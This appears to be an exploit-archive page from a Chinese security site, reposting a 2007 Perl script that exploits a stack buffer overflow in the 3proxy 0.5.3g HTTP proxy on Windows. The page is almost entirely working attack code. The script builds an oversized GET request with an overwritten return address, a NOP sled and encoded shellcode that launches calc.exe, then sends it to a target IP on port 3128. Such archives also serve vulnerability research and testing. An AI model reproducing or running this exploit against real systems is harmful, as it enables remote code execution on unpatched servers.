首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl) 来源：www.vfocus.net 作者：Marcin 发布时间：2007-12-19   #!/usr/bin/perl #This module exploits a stack overflow in 3Proxy prior to 0.5.3h, and 0.6b-devel before 20070413. By sending a long host header in HTTP GET request to the default port of # 3128, a remote attacker could overflow a buffer and execute arbitrary code. #                         # Marcin Kozlowski based on vade79 PoC # #IO::Socket for network connections use IO::Socket; #the ip address is our first commandline argument also known as ARGV[0] in Perl $ip = $ARGV[0]; #our nopsled $nopsled = "\x90"x36; $A = "A" x 1064; $B = "B" x 999; #execute calc.exe # $payload = "\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02". "\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48". "\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4". "\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12". "\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69". "\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6". "\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5". "\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21". "\x61\xdd\x0e\x4d"; #our extended instruction pointer which we use to overwrite the remote eip #remeber to make it little-endian format $eip = "\x72\x93\xab\x71"; #call esp #we construct our full attackstring here $attackstring = "GET /".$A.$eip.$nopsled.$payload." HTTP/1.0\nHost: ".$B."\n\n"; print $attackstring; #view a message if no ip address is given if(!$ip) { die "You have to provide the target's IP Address..\n"; } #the remote port to connect to $port = '3128'; #the connection protocol to use $protocol = 'tcp'; #create the actual network connection #and print an error message if it's not possible to create a socket $socket = IO::Socket::INET->new(PeerAddr=>$ip,                                 PeerPort=>$port,                                 Proto=>$protocol,                                 Timeout=>'1') || die "Could not create socket\n"; #send the payload to the remote computer print $socket $attackstring; #close the connection close($socket);   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·iMesh <= 7.1.0.x (IMWeb.dll 7. ·Linux Kernel < 2.6.11.5 BLUETO ·jetAudio 7.0.5 COWON Media Cen ·Apple Mac OS X mount_smbfs Sta ·Rosoft Media Player <= 4.1.7 . ·Shadowed Portal <= 5.7d3 Remot ·SurgeMail v.38k4 webmail Host ·OpenSSL < 0.9.7l / 0.9.8d SSLv ·MS07-065 Message Queuing Servi ·PHP ZLink 0.3 (go.php) Remote ·Samba 3.0.27a send_mailslot() ·CuteNews <= 1.4.5 Admin Passwo   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved